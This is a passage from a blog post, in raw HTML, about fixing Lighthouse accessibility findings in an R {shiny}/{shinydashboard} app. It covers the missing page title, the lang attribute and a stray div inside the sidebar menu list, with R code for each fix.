&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;a&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;li&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenuSelectedTabItem&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;null&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;section&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;aside&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;content-wrapper&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;section&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;content&amp;#34;&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab-content&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; role&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tabpanel&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab-pane&amp;#34;&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny-tab-Home&amp;#34;&lt;/span&gt;&amp;gt;Hello Dashboard&amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;section&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So what’s the problem? Well, even though our application has almost zero
content to it, it would fail even the most basic of accessibility tests.
Chromium-based browsers ship with a tool, Lighthouse, available from the
browser’s developer tools, which can produce an accessibility report for
a web page. This is by no means a comprehensive WCAG compliance
assessment, but it seems like a reasonable first hurdle to get
over.&lt;/p&gt;
&lt;p&gt;A Lighthouse report, whilst reminding us that&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Only a subset of accessibility issues can be automatically detected so
manual testing is also encouraged&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;gives the following on our “app”:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Document does not have a &lt;code&gt;&amp;lt;title&amp;gt;&lt;/code&gt; element&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element does not have a [lang] attribute&lt;/li&gt;
&lt;li&gt;Lists do not only contain &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt; elements and script supporting
elements&lt;/li&gt;
&lt;li&gt;[aria-*] attributes do not match their roles (ARIA is a set of
attributes that define ways to make web content and web applications
more accessible to people with disabilities)&lt;/li&gt;
&lt;/ul&gt;
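&lt;p&gt;Some of these findings can be reproduced without a browser. As a rough sketch, and assuming the {xml2} package is installed (it is not used elsewhere in this post), the list issue can be located by parsing a trimmed, hand-copied fragment of the sidebar markup above and looking for direct children of a &lt;code&gt;&amp;lt;ul&amp;gt;&lt;/code&gt; that are neither &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt; nor script-supporting elements. This is an illustration only, not how Lighthouse itself performs the audit.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;xml2&amp;#34;)

# Trimmed copy of the sidebar markup shown above (hand-copied for illustration)
sidebar_html = '&amp;lt;ul class=&amp;#34;sidebar-menu&amp;#34;&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href=&amp;#34;#shiny-tab-Home&amp;#34; data-toggle=&amp;#34;tab&amp;#34; data-value=&amp;#34;Home&amp;#34;&amp;gt;&amp;lt;span&amp;gt;Home page&amp;lt;/span&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;div id=&amp;#34;sidebarMenu&amp;#34; class=&amp;#34;sidebarMenuSelectedTabItem&amp;#34; data-value=&amp;#34;null&amp;#34;&amp;gt;&amp;lt;/div&amp;gt;
&amp;lt;/ul&amp;gt;'

doc = read_html(sidebar_html)

# Direct children of any &amp;lt;ul&amp;gt; that are not &amp;lt;li&amp;gt;, &amp;lt;script&amp;gt; or &amp;lt;template&amp;gt;
offenders = xml_find_all(
  doc,
  &amp;#34;//ul/*[not(self::li or self::script or self::template)]&amp;#34;
)

# Element name and id of anything that should not sit directly inside the list
xml_name(offenders)
xml_attr(offenders, &amp;#34;id&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For the fragment above, the query should pick out the &lt;code&gt;&amp;lt;div id=&amp;quot;sidebarMenu&amp;quot;&amp;gt;&lt;/code&gt; that {shinydashboard} places directly inside the menu list. A check like this only covers one rule, so it complements rather than replaces a Lighthouse run and manual testing.&lt;/p&gt;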
&lt;h3 id="the-ugly"&gt;The ugly&lt;/h3&gt;
&lt;p&gt;On the assumption I have the above app and want to stick with {shiny}
and {shinydashboard} what can I do to solve these flagged issues?&lt;/p&gt;
&lt;h4 id="document-does-not-have-a-title-element"&gt;Document does not have a &amp;lt;title&amp;gt; element&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The issue:&lt;/strong&gt; The page should have a &lt;code&gt;&amp;lt;title&amp;gt;My title&amp;lt;/title&amp;gt;&lt;/code&gt;
element within the &lt;code&gt;&amp;lt;head&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Accessibility problem:&lt;/strong&gt; The title gives users of screen readers
and other assistive technologies an overview of the page; it is the
first text that an assistive technology announces. The title is also
important for search engine users to determine whether a page is
relevant.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;A solution:&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;title&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;My app&amp;#34;&lt;/span&gt;)), &lt;span style="color:#8b949e;font-style:italic"&gt;# modification&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can solve the title issue with &lt;code&gt;title = &amp;quot;My app&amp;quot;&lt;/code&gt; in the
&lt;code&gt;dashboardPage()&lt;/code&gt; function here, but that wouldn’t be applicable to
all cases. &lt;code&gt;tags$head(tags$title())&lt;/code&gt; will always add the title tag
to the head of the web page.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
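&lt;p&gt;The reason &lt;code&gt;tags$head()&lt;/code&gt; works from anywhere in the UI is that {htmltools}, which {shiny} builds on, lifts the contents of any &lt;code&gt;tags$head()&lt;/code&gt; call out of the body when the page is rendered. A minimal sketch of that behaviour, using a made-up fragment rather than the dashboard above:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;htmltools&amp;#34;)

# A made-up UI fragment that declares a title from inside the body
fragment = tags$div(
  tags$head(tags$title(&amp;#34;My app&amp;#34;)),
  &amp;#34;Hello Dashboard&amp;#34;
)

# renderTags() separates head content from body content
rendered = renderTags(fragment)

rendered$head # markup destined for the page &amp;lt;head&amp;gt;, including the &amp;lt;title&amp;gt;
rendered$html # remaining body markup, with the title removed
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Because the hoisting happens at render time, the same trick applies to any page function, whether or not it exposes a &lt;code&gt;title&lt;/code&gt; argument.&lt;/p&gt;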
&lt;h4 id="html-element-does-not-have-a-lang-attribute"&gt;&amp;lt;html&amp;gt; element does not have a [lang] attribute&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The issue:&lt;/strong&gt; The &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element of the page should have an
attribute specifying the language of the content, e.g.
&lt;code&gt;&amp;lt;html lang='en'&amp;gt; ... &amp;lt;/html&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Accessibility problem:&lt;/strong&gt; Screen readers use a different sound
library for each language they support to ensure correct
pronunciation. If a page doesn’t specify a language, a screen reader
assumes the page is in the default language that the user chose when
setting up the screen reader, often making it impossible to
understand the content.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;A solution:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This has been raised on
&lt;a href="https://github.com/rstudio/shiny/issues/2844" rel="external"&gt;GitHub&lt;/a&gt;, and in response a
&lt;code&gt;lang&lt;/code&gt; parameter was added to &lt;code&gt;shiny::*Page()&lt;/code&gt;, but that doesn’t solve the
problem for our dashboard. A proposed, more general fix would be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;html&lt;/span&gt;(lang &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;en&amp;#34;&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# modification&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;but it is also noted that local use of a lang attribute like this
should be limited to places where the language changes, to force
screen readers to switch speech synthesizers. So this solution is
not really ideal. It is also not at all clear how to do this
properly. I had to inspect the file changes of the commits merged
for the above noted issue to find that, when running a
&lt;code&gt;shiny::shinyApp&lt;/code&gt;, the render function checks for a lang attribute on the UI object.
So this issue should really be solved with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;attr&lt;/span&gt;(ui, &lt;span style="color:#a5d6ff"&gt;&amp;#34;lang&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;en&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
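&lt;p&gt;If you need this in more than one app, the &lt;code&gt;attr()&lt;/code&gt; approach can be wrapped in a small helper. This is only a sketch: &lt;code&gt;set_page_lang()&lt;/code&gt; is a hypothetical name, the UI object is a stand-in for the value returned by &lt;code&gt;dashboardPage()&lt;/code&gt;, and whether the attribute is picked up at render time depends on the installed version of {shiny}.&lt;/p&gt;

```r
library(htmltools)

# Hypothetical helper: attach a page-level language to any UI object
set_page_lang = function(ui, lang = "en") {
  attr(ui, "lang") = lang
  ui
}

# Stand-in for the object returned by shinydashboardPlus::dashboardPage(...)
ui = tagList(tags$p("Hello Dashboard"))
ui = set_page_lang(ui, "en")

# Inspect the attribute that the render step is expected to look for
attr(ui, "lang")
```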
&lt;h4 id="lists-do-not-only-contain-li-elements-and-script-supporting-elements"&gt;Lists do not only contain &amp;lt;li&amp;gt; elements and script supporting elements&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The issue:&lt;/strong&gt; &lt;code&gt;&amp;lt;ul&amp;gt;&lt;/code&gt; and &lt;code&gt;&amp;lt;ol&amp;gt;&lt;/code&gt; list elements should only contain
&lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt; list items or script-supporting elements (&lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; or &lt;code&gt;&amp;lt;template&amp;gt;&lt;/code&gt;) within them. Here we have a
&lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; element inside our &lt;code&gt;&amp;lt;ul&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Accessibility problem:&lt;/strong&gt; Screen readers and other assistive
technologies depend on lists being structured properly to keep users
informed of content within the lists.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;A solution:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is where it starts to get a bit more painful…&lt;/p&gt;
&lt;p&gt;The list elements referred to are those in the menu, and the problem
is the &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; element&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebar-menu&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;li&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;a&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;#shiny-tab-Home&amp;#34;&lt;/span&gt; data-toggle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;Home page&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;a&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;li&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenuSelectedTabItem&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;null&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which is added to the html to be returned in the
&lt;code&gt;shinydashboard::sidebarMenu()&lt;/code&gt; function. As far as I can see, we
have two possible strategies here, neither of which is nice.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Manipulate the object returned by {shinydashboard}. Here we
could remove the rogue &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; element pretty easily&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
